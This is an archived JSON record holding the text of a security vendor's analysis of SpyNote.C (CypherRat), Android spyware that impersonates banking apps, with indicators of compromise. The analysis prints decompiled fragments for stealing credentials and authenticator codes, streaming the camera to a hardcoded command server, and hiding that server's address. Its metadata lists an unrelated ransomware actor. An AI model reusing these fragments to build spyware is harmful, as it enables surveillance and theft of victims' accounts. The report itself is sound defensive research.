{
	"id": "aaaf1f76-65ee-4158-9ea9-883735e68368",
	"created_at": "2026-04-06T00:21:36.23311Z",
	"updated_at": "2026-04-10T03:30:32.770323Z",
	"deleted_at": null,
	"sha1_hash": "307247c0e54e0c18fcd38618870614fadffcf0ec",
	"title": "SpyNote: Spyware with RAT capabilities targeting Financial Institutions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1137170,
	"plain_text": "SpyNote: Spyware with RAT capabilities targeting Financial Institutions\r\nPublished: 2024-10-01 · Archived: 2026-04-05 23:02:35 UTC\r\nUncovering the Latest Developments in SpyNote\r\nAndroid Spyware is one of the most common kinds of malware used by attackers to gain access to personal data and carry\r\nout fraud operations. Due to its capability to track a user’s location, examine web browsing behavioral patterns, and even\r\nsteal sensitive information, such as passwords and credit card numbers, the threat level that Android Spyware poses to\r\nbanking institutions and banking customers alike is comparable to Android Banking malware.\r\nSpyware also has the potential to record phone calls, remotely manage the device, intercept SMS messages, and perform\r\nother tasks by using legitimate APIs and permissions that are intended to aid people.\r\nIn the last quarter of 2022, ThreatFabric researchers observed a large increase in volume for samples belonging to the\r\nSpyNote Malware family. This family, which is also known as SpyMax, is an unique and effective Spyware designed to\r\nsecretly observe user activity on an Android device. The SpyNote malware can monitor, manage, and modify the device’s\r\nresources and features along with Remote access capabilities.\r\nThis spyware family has evolved over time, with the adoption of cutting-edge methods and technologies. SpyNote has\r\nseveral distinct variants: the most recent one, SpyNote.C, is routinely traced and tracked in day-to-day operations, and\r\nmakes up for the majority of spyware samples ThreatFabric observed from October 2022.\r\nOne of the main differences between the first variants, SpyNote.A and SpyNote.B, and the latest one, SpyNote.C, is the\r\ncampaign objective. SpyNote.C has been the first variant to openly target banking applications, impersonating a large\r\nnumber of reputable financial institutions like HSBC, Deutsche Bank, Kotak Bank, BurlaNubank, as well as others to well-known applications like WhatsApp, Facebook, and Google Play.\r\nIn addition, we also observed that the attackers utilize more generic application masquerades, such as wallpaper apps,\r\nproductivity apps, or gaming apps.\r\nThreatFabric researchers have identified that some of the SpyNote.C classified apps are being developed by lone actors and\r\npromoted as CypherRat. In this article we will discuss how developments on this actor’s project, which is advertised as\r\nboth spyware and banking malware, are likely behind the surge in numbers that we observed in the last few months.\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 1 of 7\n\nOther SpyNote.C campaigns were discovered while analyzing this Spyware family, impersonating System Notifications,\r\nGoogle Play Store. These campaigns ran together with the previously mentioned ones, with the one shown below sharing the\r\nsame hosts used as C2.\r\nSpyNote Alias CypherRat\r\nThe latest variant of this malware family, SpyNote.C, was further developed and sold to individual actors via Telegram\r\nchannel by its developer, under the name CypherRat.\r\nThe threat actor offered CypherRat for sale utilizing the Sellix payment system, which uses Cryptocurrencies to prevent\r\ntracking. These sales ran from August 2021 until October 2022, accumulating more than 80 separate customers.\r\nIn October 2022, the source code was made available as open-source via GitHub, after a leak and a few scamming incidents\r\nin hacking forums, where actors would impersonate the original threat actor to steal money from other criminals.\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 2 of 7\n\nFollowing the release of the source code, the number of samples counts have increase significantly, as we can observe in the\r\nstatistical view using our ThreatFabric Intelligence data.\r\nAs you can see, the numbers are following a clear upward trend, which allowed ThreatFabric to collect more than\r\n1100 SpyNote/CypherRat samples from October 2022; this number equals the amount of samples that we saw from the\r\nfirst test version of this variant collected in 2020.\r\nDuring the course of our investigation, we discovered that the original creator had switched his focus to a new spyware\r\nproject, CraxsRat, as a paid application with similar capabilities as the original project.\r\nOutstanding Capabilities means Exceptional Abilities\r\nWe were interested in the unique spyware skills that the SpyNote.C malware variant can do, which were identified in\r\nmalicious financial apps with RAT capabilities around 2022. We have highlighted a few of these features, which can be used\r\nto exfiltrate and utilize PII from online banking customers.\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 3 of 7\n\nUsing the privileges requested in the screenshot below, This SpyNote variant can be used to track SMS messages, calls,\r\nvideos, and audio recordings in addition to updating its version and even installing new applications.\r\nThe most recent versions of SpyNote are not only extremely powerful, but they also include a variety of security features,\r\nfrom simple string obfuscation to the use of commercial packers. This makes it much more difficult to analyze, making it a\r\npotent tool for threat actors.\r\nBelow is a list of some of the SpyNote’s standout features:\r\nAbility to use the Camera API to record and send videos from the device’s camera to the Command and\r\nControl(C\u0026C) center\r\nGPS and network location tracking information\r\nStealing social media credentials (Facebook and Google).\r\nUses Accessibility (A11y) to extract codes from Google Authenticator.\r\nUses Keylogging powered by Accessibility services, to steal banking credentials.\r\nAccessibility Service\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 4 of 7\n\nSpyNote uses Accessibility Services to make it difficult for users to uninstall the application, install new versions, and install\r\nother apps. Without any user input, SpyNote can click on the “install” and “update” buttons thanks to accessibility services:\r\n// click 'install' button via A11y\r\nif (\"android.widget.Button\".equals(accessibilityNodeInfo0.getClassName())) {\r\n String s = accessibilityNodeInfo0.getText().toString();\r\n if (!TextUtils.isEmpty(s) \u0026\u0026 ((\"安装\".equals(s)) || (\"install\".equals(s.toLowerCase())) || (\"done\".equals(s.toLowerCas\r\n accessibilityNodeInfo0.performAction(16);\r\n return true;\r\n }\r\n}\r\nThis malicious malware can access a device’s camera and send videos right to its Command-and-Control(C\u0026C) server,\r\nwhich is one of its most dangerous capabilities, and can be used to extract PII from the infected device. This gives the\r\nattacker complete control over the device’s camera, enabling them to spy on the user with it.\r\ncamera_stream.camera = Camera.open(Integer.valueOf(this.vul[0]).intValue());...InetSocketAddress inetSocketAddress0 = new\r\ncamera_stream.socket.connect(inetSocketAddress0, 60000);...Camera.Parameters params = camera_stream.camera.getParameters()\r\ncamera_stream.camera.startPreview();\r\nGoogle Authenticator with A11y\r\nSpyNote leverages Accessibility feature to obtain two-factor authentication (2FA) codes. These codes are used as an\r\nadditional layer of security in order to access an account, and are often required for logging into websites, applications, and\r\nother services. By exploiting the accessibility features of the Google Authenticator app, SpyNote is able to bypass these\r\nsecurity measures and gain access to an account without the user’s knowledge.\r\npackagename = \"com.google.android.apps.authenticator2\"\r\nIterator iterator0 = utils.findNodeWithClass(accessibilityEvent0.getSource(), \"android.view.ViewGroup\").iterator();\r\nAccessibilityNodeInfo accessibilityNodeInfo1 = accessibilityNodeInfo0.getChild(v);\r\ns1 = s1 + accessibilityNodeInfo1.getText().toString() + \"-\";\r\narr_s = s1.split(\"-\");...shared.log(utils.ssss, \"Google Authenticator\u003c\" + arr_s[v] + \"\u003c\" + arr_s[v + 1].getBytes());\r\nSocial Media Credentials (Facebook and Google)\r\nSpyNote also has the capacity to function as a social app credential stealer. This is done by deceiving users into entering\r\ntheir private login information during the login process by launching a webpage with a custom layout that looks a lot like\r\nfamous services like Gmail and Facebook, much like a traditional overlay attack is used to show victims a bogus login page\r\nfor their banking application.\r\nUpon receiving a command from the attacker, the attacker’s C\u0026C server receives the credentials and information that were\r\nacquired from the webpage.\r\n// show fake Gmail for Facebook layout\r\nsocial_creds.this.setContentView(0x7F070001);\r\n// layout:glogin\r\n// set callbacks to handle clicks\r\nsocial_creds.this.findViewById(0x7F050031).setOnClickListener(singimallisten); // id:sinbtn\r\nsocial_creds.this.findViewById(0x7F050023).setOnClickListener(lrnmor); // id:lrnmor\r\nsocial_creds.this.findViewById(0x7F050016).setOnClickListener(Recovergmal); // id:gmailforgtpass\r\n// callback to extract user and password\r\nhis.singimallisten = new View.OnClickListener() {\r\n public void onClick(View view0) {\r\n String usrgmail = (social_creds.this.findViewById(0x7F050043)).getText().toString(); // id:usrgmail\r\n String passgmal = (social_creds.this.findViewById(0x7F05002C)).getText().toString(); // id:passgmal\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 5 of 7\n\nif (usrgmail.length() \u003c= 3) {\r\n cmd_receiver.showToast(\"Please Check Your Email/Password.\");\r\n return;\r\n }\r\n if (passgmal.length() \u003c 8) {\r\n cmd_receiver.showToast(\"Password Must At least 8 characters.\");\r\n return;\r\n }\r\n shared.log(ddddd.ssss, \"Gmail\u003c\" + s + \"\u003c\" + s1.getBytes());\r\n social_creds.this.done = true;\r\n social_creds.this.finish();\r\n }\r\n};\r\nThe acquired sensitive information is then transferred to the C\u0026C server hardcoded within the application upon receiving\r\nthe command from the attacker via Accessibility service, encrypted using Base64 to make it stealthier and difficult to\r\nidentify the host.\r\n// Identified host, port and key used for C\u0026C communication\r\nstatic {\r\n AccessibilityService.key =\r\n const.encryp(\"bW1tbTE=\"); // mmmm1\r\n AccessibilityService.c = \"K\";\r\n AccessibilityService.d = \"dGV4dA==\"; // text\r\n AccessibilityService.e = \"ZGV2ZWxvcA==\"; // develop\r\n AccessibilityService.host = \"YWRuYW5rYXJhMS5kZG5zLm5ldA==\"; // adnankara1.ddns.net\r\n AccessibilityService.port = \"Nzc3MQ==\"; // 7771\r\n}\r\nSimilar code patterns were identified in all SpyNote.C related applications, and the aggregated host, port, and key strings\r\nobserved from these financial institutions are listed below:\r\nOther common Capabilities\r\nSpyNote also adopts common features that are observed in other Spyware by abusing legitimate APIs, such as tracking\r\nlocation from the users infected device via “GPS” and “Network” thanks to “LocationManager” provided by Android\r\nsystem. Similarly, by abusing MediaProjection to capture screen content.\r\nThese are not necessarily connected to banking fraud, but do offer criminals even more information on the victim.\r\nConclusion\r\nAs the landscape of Android Spyware evolves, mobile users are always confronted with new and innovative threats. We\r\npredict that SpyNote will keep using Accessibility Service to collect essential data from users’ devices and that it will be\r\nable to develop towards a successful distribution. We also believe that the trend will continue adopting better security\r\nmeasures like obfuscation and packers to help safeguard the program itself. It is very likely that different forks of SpyNote\r\nwill continue appearing, following the release of it source code.\r\nResearchers at ThreatFabric are constantly keeping an eye on the mobile threat landscape, and by following various actors\r\nand campaigns, we are able to recognize and capture malware that specifically targets financial institutions. This\r\ndevelopment is not as common within the Android Spyware ecosystem, but is extremely dangerous and shows the potential\r\nstart of a new trend, which will see a gradual disappearance of the distinction between spyware and Banking malware, due\r\nto the power that the abuse of Accessibility services gives to criminals.\r\nFinancial organizations are welcome to contact us: if you suspect some app be involved in malicious activity, feel free to\r\nreach our Mobile Threat Intelligence team which will provide additional details and help with reporting the malicious app if\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 6 of 7\n\nidentified: mti@threatfabric.com.\r\nAppendix\r\nSpyNote Samples\r\nApp name Package name SHA-256\r\nHSBC UK\r\nMobile\r\nBanking\r\ncom.employ.mb 6f606bc5004af2b90b66d6e6e4f29f35a3b4a31dc6974b55434b3c53d70\r\nDeutsche Bank\r\nMobile\r\ncom.reporting.efficiency 114fa822d7a96169c9cd48303f7fbd1af94f57cb46fec576d91ccea11bc5\r\nBurlaNubank com.appser.verapp 34d70ce1e9eeafdc225abbfa84c24454986a47ca7a41431c38ca16e612d\r\nKotak Bank splash.app.main bd172dbb47a95e7abc3ce76118bf6cd3f742d7c932ec8801cd553509f31\r\nBank of\r\nAmerica\r\nConfirmation\r\nyps.eton.application 2e1c68c3e785679c04d915eb2f960ef5e7ef3294a423e1835aa06e02548\r\nCypherRat com.appser.verapp 4779c469c50d157d2140d39fc9b034c931b5224e886bcb60024687fe40\r\nVirtual\r\nSimCard\r\ncobi0jbpm.apvy8vjjvpser.verapchvvhbjbjq a2a95cfccb8fbe557f605b8a47dad901d3a25f8cdae7f0beee133f60b924\r\nCurrent\r\nActivity\r\ncom.willme.topactivity bade089b4dfdea057132551deb997ba8a25c4d1ced32f78975239c7324\r\nConversations_ com.appser.verapp bf4e003360cb2024dfaa46a79bf05f667d300f2bcd0765b9a12500201b9\r\nSpyNote C2s connected to Banking campaigns\r\nHost Port\r\nbizebiz.myftp.org 6378\r\nadnankara1.ddns.net 7771\r\nsilent911-44688.portmap.io 44688\r\n154.211.96.78 8088\r\n159.203.126.35 22526\r\nSource: https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nhttps://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions\r\nPage 7 of 7",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.threatfabric.com/blogs/spynote-rat-targeting-financial-institutions"
	],
	"report_names": [
		"spynote-rat-targeting-financial-institutions"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434896,
	"ts_updated_at": 1775791832,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.pdf",
		"text": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.txt",
		"img": "https://archive.orkl.eu/307247c0e54e0c18fcd38618870614fadffcf0ec.jpg"
	}
}